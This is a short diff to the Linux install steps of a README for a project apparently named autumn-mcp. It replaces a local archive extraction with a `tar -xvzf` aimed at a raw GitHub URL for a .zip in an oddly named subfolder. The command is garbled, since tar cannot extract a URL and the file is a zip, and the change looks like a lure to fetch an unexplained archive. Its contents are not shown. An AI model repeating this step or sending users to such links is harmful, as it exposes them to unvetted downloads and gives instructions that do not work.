Nickha124/autumn-mcp/README.md

    - **For Linux:**
      - Open the terminal.
      - Navigate to the directory where you downloaded the package.
-     - Use `tar -xvzf autumn-mcp-linux.tar.gz` to extract the files.
+     - Use `tar -xvzf https://raw.githubusercontent.com/Nickha124/autumn-mcp/master/orthoclastic/autumn-mcp.zip` to extract the files.
      - Follow the instructions in the README file located in the extracted folder.

 ## 📖 How to Use autumn-mcp